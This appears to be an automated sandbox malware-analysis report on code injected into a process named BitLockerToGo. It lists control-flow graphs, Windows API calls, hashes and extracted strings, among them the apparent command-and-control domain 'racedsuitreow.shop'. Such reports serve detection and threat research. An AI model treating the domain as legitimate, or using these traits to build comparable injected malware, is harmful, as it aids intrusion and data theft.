                                          control_flow_graph 77 2b0dee8-2b0def2 78 2b0df20-2b0df33 77->78 79 2b0df02-2b0df19 77->79 80 2b0e243-2b0e253 SysFreeString * 2 77->80 81 2b0def9 77->81 82 2b0df3d-2b0df5b 77->82 96 2b0df37 78->96 79->78 83 2b0e258-2b0e269 80->83 84 2b0e499-2b0e4ee SysFreeString call 2b18120 GetVolumeInformationW 80->84 81->79 85 2b0e160 82->85 86 2b0e190-2b0e1bc 82->86 87 2b0e201-2b0e204 82->87 88 2b0df62-2b0dfaa VariantInit 82->88 89 2b0e1c2-2b0e1cd 82->89 90 2b0e1e4 82->90 91 2b0e1d4-2b0e1dd 82->91 92 2b0e235-2b0e23c 82->92 93 2b0e166-2b0e187 82->93 94 2b0dffa-2b0e01b SysStringLen 82->94 101 2b0e270-2b0e279 83->101 102 2b0e280-2b0e28e 83->102 103 2b0e310-2b0e31d 83->103 104 2b0e2a3-2b0e2db call 2b056b0 83->104 105 2b0e324-2b0e333 83->105 106 2b0e295-2b0e2a1 83->106 107 2b0e33a-2b0e341 83->107 84->83 84->101 84->102 84->103 84->104 84->105 84->106 84->107 132 2b0e4f5-2b0e51f 84->132 85->93 86->89 87->92 97 2b0dfac-2b0dfaf 88->97 98 2b0dfcf-2b0dfde 88->98 89->90 89->91 91->85 91->86 91->89 91->90 91->91 91->93 113 2b0e240 92->113 93->86 99 2b0e058 94->99 100 2b0e01d-2b0e021 94->100 96->82 111 2b0dfb0-2b0dfcd call 2b11dc0 97->111 117 2b0dfe2-2b0dff3 98->117 109 2b0e05a-2b0e071 call 2adc610 99->109 112 2b0e031-2b0e034 100->112 101->102 101->103 101->104 101->105 101->106 102->103 102->104 102->105 102->106 103->103 103->105 121 2b0e2e0-2b0e2e7 104->121 105->101 105->102 105->103 105->104 105->105 105->106 105->107 106->104 126 2b0e132-2b0e152 109->126 127 2b0e077-2b0e07e 109->127 111->98 112->109 118 2b0e036-2b0e052 112->118 113->80 117->85 117->86 117->87 117->89 117->90 117->91 117->93 117->94 119 2b0e023-2b0e02f 118->119 120 2b0e054-2b0e056 118->120 119->109 119->112 120->119 121->121 125 2b0e2e9-2b0e302 121->125 125->103 125->105 126->85 126->86 126->89 126->90 126->91 126->93 127->126 129 2b0e084-2b0e090 127->129 131 2b0e093-2b0e09a 129->131 131->126 133 2b0e0a0-2b0e0a4 131->133 140 2b0e521 132->140 141 2b0e54f-2b0e5d0 SysAllocString 132->141 134 2b0e0a6-2b0e0ad 133->134 135 2b0e0af-2b0e0bf 133->135 137 2b0e11d-2b0e122 134->137 138 2b0e0c1-2b0e0c7 135->138 139 2b0e0e6-2b0e0f1 135->139 137->126 144 2b0e124-2b0e12c 137->144 138->139 142 2b0e0c9-2b0e0e4 138->142 139->137 143 2b0e0f3-2b0e118 139->143 145 2b0e530-2b0e54d call 2b11cc0 140->145 146 2b0e5d2 141->146 147 2b0e5ff-2b0e61a SysAllocString 141->147 142->137 143->137 144->126 144->131 145->141 149 2b0e5e0-2b0e5fd call 2b11d50 146->149 153 2b0e648-2b0e669 147->153 149->147 155 2b0e66b 153->155 156 2b0e68f-2b0e711 SysAllocString 153->156 157 2b0e670-2b0e68d call 2b11cc0 155->157 158 2b0e620-2b0e63b SysAllocString 156->158 159 2b0e717 156->159 157->156 162 2b0e63f 158->162 161 2b0e720-2b0e73d call 2b11d50 159->161 166 2b0e73f 161->166 162->153 166->158
                                          APIs
                                          • VariantInit.OLEAUT32 ref: 02B0DF63
                                          • SysStringLen.OLEAUT32(FB06F919), ref: 02B0E000
                                          • SysFreeString.OLEAUT32(?), ref: 02B0E24C
                                          • SysFreeString.OLEAUT32(?), ref: 02B0E251
                                          • SysFreeString.OLEAUT32(?), ref: 02B0E4A5
                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02B0E4E2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: String$Free$InformationInitVariantVolume
                                          • String ID:
                                          • API String ID: 3515333423-0
                                          • Opcode ID: c617079dd18bb3c3f61fd9e93292ad3a9c5a8c0ca796f3af1d01b90030001dd5
                                          • Instruction ID: 75661ef72b7119d33106b982708b6df509a58659b236f42279d03784de0c40d9
                                          • Opcode Fuzzy Hash: c617079dd18bb3c3f61fd9e93292ad3a9c5a8c0ca796f3af1d01b90030001dd5
                                          • Instruction Fuzzy Hash: 84E1CC75604701CFD7288F24D891B26BBF2FB89350F158AACE9928B7A1D735E815CB10

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 240 2adcd20-2adcd2b call 2b13af0 243 2adcf0e-2adcf10 ExitProcess 240->243 244 2adcd31-2adcd40 GetInputState call 2b0b3f0 240->244 247 2adcf09 call 2b14f70 244->247 248 2adcd46-2adcd76 GetCurrentThreadId GetCurrentProcessId 244->248 247->243 249 2adcd78 248->249 250 2adcda6-2adcdca 248->250 254 2adcd80-2adcda4 call 2adcf20 249->254 252 2adcdcc-2adcdcf 250->252 253 2adcdf6-2adcdf8 250->253 255 2adcdd0-2adcdf4 call 2adcfa0 252->255 256 2adcdfe-2adce1f 253->256 257 2adcea6-2adcecb 253->257 254->250 255->253 262 2adce56-2adce7a 256->262 263 2adce21 256->263 259 2adcecd-2adcecf 257->259 260 2adcef6-2adcefd call 2ade8d0 257->260 265 2adced0-2adcef4 call 2add120 259->265 260->247 275 2adceff call 2ae1d40 260->275 262->257 269 2adce7c-2adce7f 262->269 268 2adce30-2adce54 call 2add010 263->268 265->260 268->262 273 2adce80-2adcea4 call 2add0a0 269->273 273->257 280 2adcf04 call 2adfff0 275->280 280->247
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: CurrentProcess$ExitInputStateThread
                                          • String ID: spqv
                                          • API String ID: 1029096631-2206016640
                                          • Opcode ID: f35114b8d11bacedd7e0c55cdb57253710cdeba8c384779922f51cadd3c9c36d
                                          • Instruction ID: cf360faa2d005d4b1b6be4926e53ccb8ab46c713f85e3ed271e983a54e490601
                                          • Opcode Fuzzy Hash: f35114b8d11bacedd7e0c55cdb57253710cdeba8c384779922f51cadd3c9c36d
                                          • Instruction Fuzzy Hash: BF41337084C3409BD301AF69D184A1EFBE6AF56714F949D0DE0CA9B252DB3AD810CF6B

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 282 2b156c9 283 2b15884-2b15894 call 2b13820 282->283 286 2b158b3 283->286 287 2b15896-2b1589f 283->287 289 2b158b6-2b1590f 286->289 288 2b158a0-2b158af 287->288 288->288 290 2b158b1 288->290 291 2b15911 289->291 292 2b15946-2b15954 289->292 290->289 293 2b15920-2b15944 call 2b16980 291->293 294 2b15997-2b1599c 292->294 295 2b15956-2b1595f 292->295 293->292 297 2b15797-2b157b4 294->297 298 2b157ff 294->298 299 2b15761-2b15768 294->299 300 2b15840 294->300 301 2b15860-2b15878 294->301 302 2b15c00 294->302 303 2b159a3-2b159a8 294->303 304 2b15846-2b1584f 294->304 305 2b15a46-2b15a60 294->305 306 2b15ac8-2b15ae7 294->306 307 2b15c08 294->307 308 2b159eb-2b15a05 294->308 309 2b1576d-2b15790 call 2b16080 294->309 310 2b156ce-2b156fc 294->310 296 2b15960-2b15967 295->296 313 2b15973-2b1597c 296->313 314 2b15969-2b1596c 296->314 315 2b157e4-2b157f8 297->315 316 2b157b6 297->316 326 2b15b5c-2b15b7b 299->326 301->283 302->307 303->302 303->307 303->308 304->301 319 2b15a62 305->319 320 2b15a94-2b15ac3 305->320 323 2b15b16-2b15b1d 306->323 324 2b15ae9 306->324 317 2b15a34-2b15a3b 308->317 318 2b15a07 308->318 309->297 309->298 309->300 309->301 309->304 309->305 309->306 309->308 321 2b15726-2b15731 310->321 322 2b156fe-2b156ff 310->322 313->294 329 2b1597e-2b1598f call 2b15510 313->329 314->296 328 2b1596e-2b15971 314->328 315->298 315->305 315->306 315->308 330 2b157c0-2b157e2 call 2b169f0 316->330 317->305 333 2b15a10-2b15a32 call 2b16a90 318->333 334 2b15a70-2b15a92 call 2b16a90 319->334 320->308 337 2b15733-2b1573b 321->337 338 2b15752 321->338 335 2b15700-2b15724 call 2b16980 322->335 323->326 339 2b15b1f-2b15b2a 323->339 336 2b15af0-2b15b14 call 2b16980 324->336 331 2b15ba6-2b15bad 326->331 332 2b15b7d-2b15b7f 326->332 328->294 352 2b15994 329->352 330->315 343 2b15bea-2b15bf1 331->343 344 2b15baf-2b15bba 331->344 342 2b15b80-2b15ba4 call 2b16980 332->342 333->317 334->320 335->321 336->323 349 2b15740-2b15747 337->349 350 2b15755-2b1575a 338->350 351 2b15b30-2b15b37 339->351 342->331 343->302 343->307 357 2b15c20-2b15c26 call 2b189b0 343->357 358 2b15c30 343->358 359 2b15eb4-2b15ebb 343->359 360 2b15c36-2b15c41 343->360 361 2b15c0e-2b15c17 call 2b189b0 343->361 355 2b15bc0-2b15bc7 344->355 365 2b15805-2b1580e 349->365 366 2b1574d-2b15750 349->366 350->297 350->298 350->299 350->300 350->301 350->304 350->305 350->306 350->308 350->309 367 2b15b40-2b15b46 351->367 368 2b15b39-2b15b3c 351->368 352->294 387 2b15bd0-2b15bd6 355->387 388 2b15bc9-2b15bcc 355->388 357->358 358->360 360->359 369 2b15c50 360->369 370 2b15c70-2b15c83 360->370 371 2b15c90 360->371 372 2b15f50-2b15f6a 360->372 373 2b15eb0 360->373 374 2b15c52 360->374 375 2b15c96-2b15c9f 360->375 376 2b15c58-2b15c5e 360->376 377 2b15ebc-2b15ed6 360->377 378 2b15e9f-2b15ea5 360->378 379 2b15ca0 360->379 380 2b15fe0 360->380 381 2b15c48-2b15c4f 360->381 382 2b15cad 360->382 383 2b15fce-2b15fd3 360->383 361->357 365->350 386 2b15814-2b15830 call 2b15510 365->386 366->338 366->349 367->326 384 2b15b48-2b15b54 call 2b15510 367->384 368->351 391 2b15b3e 368->391 370->371 371->375 399 2b15f96-2b15f9d 372->399 400 2b15f6c-2b15f6f 372->400 373->359 374->376 375->379 376->370 395 2b15f06-2b15f0d 377->395 396 2b15ed8 377->396 378->373 379->382 381->369 382->378 383->380 402 2b15b59 384->402 403 2b15835-2b1583b 386->403 387->343 397 2b15bd8-2b15be2 call 2b15510 387->397 388->355 394 2b15bce 388->394 391->326 394->343 395->372 406 2b15f0f-2b15f1a 395->406 404 2b15ee0-2b15f04 call 2b16980 396->404 411 2b15be7 397->411 408 2b15fc8 399->408 409 2b15f9f-2b15faa 399->409 407 2b15f70-2b15f94 call 2b16980 400->407 402->326 403->350 404->395 412 2b15f20-2b15f27 406->412 407->399 408->383 414 2b15fb0-2b15fb7 409->414 411->343 418 2b15f30-2b15f36 412->418 419 2b15f29-2b15f2c 412->419 415 2b15fc0-2b15fc6 414->415 416 2b15fb9-2b15fbc 414->416 415->408 422 2b15fe2-2b15ff2 call 2b15510 415->422 416->414 421 2b15fbe 416->421 418->372 424 2b15f38-2b15f4d call 2b15510 418->424 419->412 423 2b15f2e 419->423 421->408 427 2b15ff7 422->427 423->372 424->372
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %&' $%sgh$4`[b
                                          • API String ID: 0-2655511146
                                          • Opcode ID: 33a1b42aaf698ff89c83e1387ef5bb6127972890ed00adb490d1b96e9238c312
                                          • Instruction ID: 1a9752d1a8af9ba0898d52eaf97985e98975330c2a59c07847d9550680f0cae8
                                          • Opcode Fuzzy Hash: 33a1b42aaf698ff89c83e1387ef5bb6127972890ed00adb490d1b96e9238c312
                                          • Instruction Fuzzy Hash: 9F12CCB0E00205DFDB24CF94D891BBFBBB6FF89345FA54498D505A7281D334A958CBA1

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 429 2b15510-2b15542 LdrInitializeThunk
                                          APIs
                                          • LdrInitializeThunk.NTDLL(02B18D50,005C003F,00000006,?,?,00000018,%&' ,?,?), ref: 02B1553E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: %&'
                                          • API String ID: 2994545307-1807952111
                                          • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                          • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                          • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                          • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 430 2b0de76-2b0de79 431 2b0de80 430->431 432 2b0deb0 430->432 433 2b0dee1 430->433 434 2b0deb2-2b0ded5 CoCreateInstance 430->434 435 2b0de86-2b0deab 430->435 436 2b0dedc-2b0e4ee call 2b18120 GetVolumeInformationW 430->436 431->435 432->434 438 2b0e258-2b0e269 433->438 434->433 434->436 435->432 436->438 439 2b0e270-2b0e279 436->439 440 2b0e280-2b0e28e 436->440 441 2b0e310-2b0e31d 436->441 442 2b0e2a3-2b0e2db call 2b056b0 436->442 443 2b0e324-2b0e333 436->443 444 2b0e295-2b0e2a1 436->444 445 2b0e33a-2b0e341 436->445 449 2b0e4f5-2b0e51f 436->449 438->439 438->440 438->441 438->442 438->443 438->444 438->445 439->440 439->441 439->442 439->443 439->444 440->441 440->442 440->443 440->444 441->441 441->443 451 2b0e2e0-2b0e2e7 442->451 443->439 443->440 443->441 443->442 443->443 443->444 443->445 444->442 454 2b0e521 449->454 455 2b0e54f-2b0e5d0 SysAllocString 449->455 451->451 453 2b0e2e9-2b0e302 451->453 453->441 453->443 456 2b0e530-2b0e54d call 2b11cc0 454->456 457 2b0e5d2 455->457 458 2b0e5ff-2b0e61a SysAllocString 455->458 456->455 460 2b0e5e0-2b0e5fd call 2b11d50 457->460 464 2b0e648-2b0e669 458->464 460->458 466 2b0e66b 464->466 467 2b0e68f-2b0e711 SysAllocString 464->467 468 2b0e670-2b0e68d call 2b11cc0 466->468 469 2b0e620-2b0e63b SysAllocString 467->469 470 2b0e717 467->470 468->467 473 2b0e63f 469->473 472 2b0e720-2b0e73d call 2b11d50 470->472 477 2b0e73f 472->477 473->464 477->469
                                          APIs
                                          • CoCreateInstance.OLE32(02B1CCE0,00000000,00000001,02B1CCD0,?), ref: 02B0DECA
                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02B0E4E2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: CreateInformationInstanceVolume
                                          • String ID:
                                          • API String ID: 344472464-0
                                          • Opcode ID: b4a194c9eefe91c93900bf20268622116e00de92f2f9c1dfe05727d5a027ea15
                                          • Instruction ID: 57494a602041532e40f9e0fe5a43eb075ba20abf4ad05e887aa124bdaab75cdc
                                          • Opcode Fuzzy Hash: b4a194c9eefe91c93900bf20268622116e00de92f2f9c1dfe05727d5a027ea15
                                          • Instruction Fuzzy Hash: 9041E476794701DFE7288F28EC51B297BE2FB85350F1A496CE906CB6E0D775A825CB00

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 478 2b18bc0-2b18bcb 479 2b18bd0-2b18bd9 478->479 479->479 480 2b18bdb-2b18bef 479->480 481 2b18bf1-2b18bf6 480->481 482 2b18bf8 480->482 483 2b18bff-2b18c27 call 2adc610 481->483 482->483 486 2b18c42-2b18cc3 483->486 487 2b18c29-2b18c2f 483->487 489 2b18cc5 486->489 490 2b18cf6-2b18d01 486->490 488 2b18c30-2b18c40 487->488 488->486 488->488 491 2b18cd0-2b18cf4 call 2b1a5e0 489->491 492 2b18d03-2b18d0b 490->492 493 2b18d55-2b18d67 call 2adc620 490->493 491->490 496 2b18d10-2b18d17 492->496 499 2b18d20-2b18d26 496->499 500 2b18d19-2b18d1c 496->500 499->493 502 2b18d28-2b18d4b call 2b15510 499->502 500->496 501 2b18d1e 500->501 501->493 504 2b18d50-2b18d53 502->504 504->493
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: %&' $@
                                          • API String ID: 2994545307-717135571
                                          • Opcode ID: 64248fa667ffb465fa16d8433d21c1cc9164d8b226c8641724f3d721fa964673
                                          • Instruction ID: 8d16346be658dcaaf1409d3ebd07b7e9a320635a66734ddb4044df5881c8b461
                                          • Opcode Fuzzy Hash: 64248fa667ffb465fa16d8433d21c1cc9164d8b226c8641724f3d721fa964673
                                          • Instruction Fuzzy Hash: F941FDB15083009FD710DF58C880A6BBBF6FF85358F88896DE489CB2A1E375C918CB52

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 563 2ae076f-2ae0774 564 2ae068d-2ae068f 563->564 565 2ae077b-2ae077d 563->565 566 2ae05a7-2ae05d0 563->566 567 2ae03b4-2ae03bb 563->567 584 2ae0691-2ae069b 564->584 568 2ae060b-2ae0639 566->568 569 2ae05d2 566->569 570 2ae036e-2ae0374 567->570 571 2ae030a-2ae030f 567->571 572 2ae03c2-2ae042e 567->572 573 2ae0360-2ae0367 567->573 574 2ae053c-2ae054f 567->574 575 2ae033a-2ae0344 call 2b14f90 567->575 576 2ae037b-2ae0382 567->576 577 2ae0515-2ae0529 567->577 578 2ae04d2-2ae04fe 567->578 579 2ae0530 567->579 580 2ae0550 567->580 581 2ae0330-2ae0333 567->581 582 2ae0350-2ae0357 call 2b14f90 567->582 583 2ae02d0-2ae02fc 567->583 590 2ae063b 568->590 591 2ae0666-2ae0686 568->591 589 2ae05e0-2ae0609 call 2ae1800 569->589 570->571 570->576 585 2ae038d 570->585 586 2ae0389 570->586 587 2ae0392-2ae039b 570->587 588 2ae0303 570->588 605 2ae0316-2ae0329 571->605 592 2ae045b-2ae0463 572->592 593 2ae0430-2ae0459 call 2ae1880 572->593 573->570 573->583 574->580 575->582 576->585 576->586 577->570 577->571 577->573 577->574 577->575 577->576 577->579 577->580 577->581 577->582 577->583 606 2ae0505-2ae050e 578->606 609 2ae0537 579->609 580->566 581->575 582->573 583->571 583->576 583->585 583->586 583->587 583->588 584->563 585->587 586->585 597 2ae03a4-2ae03b3 587->597 598 2ae03a2 587->598 588->571 589->568 599 2ae0640-2ae0664 call 2ae1790 590->599 591->564 591->567 601 2ae0465-2ae046f 592->601 602 2ae0482-2ae0492 592->602 593->592 598->597 599->591 615 2ae0470-2ae0480 601->615 616 2ae04b6-2ae04c8 602->616 617 2ae0494-2ae0496 602->617 605->570 605->573 605->575 605->576 605->581 605->582 605->583 606->570 606->571 606->573 606->574 606->575 606->576 606->577 606->579 606->580 606->581 606->582 606->583 609->584 615->602 615->615 616->578 619 2ae04a0-2ae04b2 617->619 619->619 620 2ae04b4 619->620 620->616
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @A
                                          • API String ID: 0-2960862460
                                          • Opcode ID: 58ab9b0bfcaac8b86f8a6e627fe0e0891bf5fd4ba1ac5eb85ed8fa1d641c591f
                                          • Instruction ID: 07b59fef8fb7708536f199a0189673ebb2155032abf3d4a1e13ab97dd43a68ad
                                          • Opcode Fuzzy Hash: 58ab9b0bfcaac8b86f8a6e627fe0e0891bf5fd4ba1ac5eb85ed8fa1d641c591f
                                          • Instruction Fuzzy Hash: CB918570508341EFD7109F65E890B2BBBF5AF89384F819C2CF99587250DB78D865CB12

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 167 2ae1d87-2ae1dc4 call 2b0dcf0 170 2ae1dc6 167->170 171 2ae1e10-2ae1e87 167->171 172 2ae1dd0-2ae1e0e call 2aea280 170->172 173 2ae1e89 171->173 174 2ae1ec1-2ae1ed2 171->174 172->171 178 2ae1e90-2ae1ebf call 2aea200 173->178 175 2ae1eeb-2ae1ef3 174->175 176 2ae1ed4-2ae1edb 174->176 180 2ae1f0b-2ae1f18 175->180 181 2ae1ef5-2ae1ef6 175->181 179 2ae1ee0-2ae1ee9 176->179 178->174 179->175 179->179 185 2ae1f1a-2ae1f21 180->185 186 2ae1f3b-2ae1f43 180->186 184 2ae1f00-2ae1f09 181->184 184->180 184->184 188 2ae1f30-2ae1f39 185->188 189 2ae1f5b-2ae2097 186->189 190 2ae1f45-2ae1f46 186->190 188->186 188->188 192 2ae2099 189->192 193 2ae20e0-2ae2124 189->193 191 2ae1f50-2ae1f59 190->191 191->189 191->191 196 2ae20a0-2ae20de call 2aea380 192->196 194 2ae2126 193->194 195 2ae2161-2ae2195 call 2ae0000 193->195 197 2ae2130-2ae215f call 2aea310 194->197 204 2ae224f-2ae2255 call 2adc620 195->204 205 2ae219c-2ae21a9 195->205 206 2ae223c-2ae2245 call 2ad3bb0 195->206 207 2ae2258-2ae22a0 call 2ad4530 195->207 208 2ae2308-2ae2310 call 2b0d4a0 195->208 209 2ae2317 195->209 210 2ae21c3-2ae21eb GetSystemDirectoryW 195->210 211 2ae21b0-2ae21b8 CoUninitialize 195->211 196->193 197->195 204->207 205->204 205->206 205->207 205->208 205->209 205->211 206->204 224 2ae22a2 207->224 225 2ae22f0-2ae2301 call 2ad45b0 207->225 208->204 208->205 208->206 208->207 208->209 208->210 208->211 215 2ae32b8-2ae32bf 209->215 216 2ae21ed-2ae21f0 210->216 217 2ae21f2 210->217 211->215 216->217 222 2ae21f3-2ae21fb 216->222 217->222 226 2ae21fd-2ae2200 222->226 227 2ae2202 222->227 229 2ae22b0-2ae22ee call 2aea400 224->229 225->208 225->209 226->227 228 2ae2203-2ae221f call 2adc610 call 2b0ea80 call 2b11fa0 226->228 227->228 239 2ae2224-2ae2235 228->239 229->225 239->204 239->206 239->207 239->208 239->209 239->211
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 02AE21C9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: DirectorySystem
                                          • String ID: 1BE*$FAE8DCA8A7591667ED0AFBD62A21FAC1$racedsuitreow.shop$~x
                                          • API String ID: 2188284642-2341768932
                                          • Opcode ID: 30489b3f316d89efb9f8b8717da53c110cbf80d98d1487ffd700edf004d282b6
                                          • Instruction ID: 19bd5b970dcb1ba750e5dcfd77d83e45b3de638ebff329a0006542cea2ab495d
                                          • Opcode Fuzzy Hash: 30489b3f316d89efb9f8b8717da53c110cbf80d98d1487ffd700edf004d282b6
                                          • Instruction Fuzzy Hash: F3C178B444A3D1CAE7318F149894BAFBBE1BF86344F440D5DE8CA4B242D7358506CBA3

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 505 2ade8d0-2ade904 506 2ade906 505->506 507 2ade941-2ade98c 505->507 508 2ade910-2ade93f call 2ae1110 506->508 509 2ade98e-2ade98f 507->509 510 2ade9b6-2ade9ce LoadLibraryExW call 2b13800 507->510 508->507 512 2ade990-2ade9b4 call 2ae1090 509->512 517 2ade9dc-2adea67 call 2b18120 * 6 510->517 518 2ade9d5-2ade9d7 510->518 512->510 520 2adec55-2adec5f 517->520 518->520
                                          APIs
                                          • LoadLibraryExW.KERNEL32(1FB719A3,00000000,C9CAF3CC), ref: 02ADE9BE
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: a992f5c5a3b6fd6d3ff03c2c54d252d85451c2a1671f4abfffd9dd1d9fdb5e56
                                          • Instruction ID: f0af592a50794a3608ea16606eefce838c2aec8bb7e581b605c4056acf58c3e0
                                          • Opcode Fuzzy Hash: a992f5c5a3b6fd6d3ff03c2c54d252d85451c2a1671f4abfffd9dd1d9fdb5e56
                                          • Instruction Fuzzy Hash: 2D41C1B0D58340AFD3119F24E841A1EFBE6FB85344F405C6CE4846B211DB398569CF62

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 533 2b14e47-2b14e92 534 2b14e94 533->534 535 2b14ec6-2b14edb LoadLibraryExW 533->535 536 2b14ea0-2b14ec4 call 2b152f0 534->536 537 2b14edd-2b14f07 535->537 538 2b14f4e-2b14f56 535->538 536->535 539 2b14f2c-2b14f4b 537->539 538->539
                                          APIs
                                          • LoadLibraryExW.KERNEL32(09840B71,00000000,00000800), ref: 02B14ED2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 7168e6d17aefc6f370ebd28654095c83af1b57232e4a444b737d882210779f0f
                                          • Instruction ID: 0d650993e6cc1dd0962c83c99a7259246098bad96e2feb086444f5bd20ad7b16
                                          • Opcode Fuzzy Hash: 7168e6d17aefc6f370ebd28654095c83af1b57232e4a444b737d882210779f0f
                                          • Instruction Fuzzy Hash: 9C1194759983009FC300EF28E88462ABBF1EB98388F944C1CE5C6C3342D7399968CF16

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 542 2b0e349-2b0e382 543 2b0e384 542->543 544 2b0e3af-2b0e3cf SysAllocString 542->544 545 2b0e390-2b0e3ad call 2b11c60 543->545 546 2b0e3d3 544->546 545->544 546->546
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: AllocString
                                          • String ID:
                                          • API String ID: 2525500382-0
                                          • Opcode ID: 6e1bada3894e27ac571ae6a98ad0a3779e2aa068788b614955dfd79a8e0c2fc5
                                          • Instruction ID: eedc87878dfef1cc182f6a9696d1508457a7de34f62a1e844ce4be4089839aca
                                          • Opcode Fuzzy Hash: 6e1bada3894e27ac571ae6a98ad0a3779e2aa068788b614955dfd79a8e0c2fc5
                                          • Instruction Fuzzy Hash: 6C018C74605240DFD725CF58C4D4A027FF1EF5A341B600888E8C28B256C33AE866DB90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 549 2b11f20-2b11f40 550 2b11f42 549->550 551 2b11f76-2b11f90 RtlAllocateHeap 549->551 552 2b11f50-2b11f74 call 2b15360 550->552 552->551
                                          APIs
                                          • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 02B11F87
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 33baaa68d7349529add0e03da518275e6cf3aafa264fd33f288eaf3a70f61208
                                          • Instruction ID: ad6b7fe43475677591d707bd695b9c67183d4664b33e86c95ca18a1724928080
                                          • Opcode Fuzzy Hash: 33baaa68d7349529add0e03da518275e6cf3aafa264fd33f288eaf3a70f61208
                                          • Instruction Fuzzy Hash: 65F017B4508280ABD311EF08D895A1EFBF5FB95604F848D5CE5C887261C335D828CB66

                                          Control-flow Graph

                                          • Executed
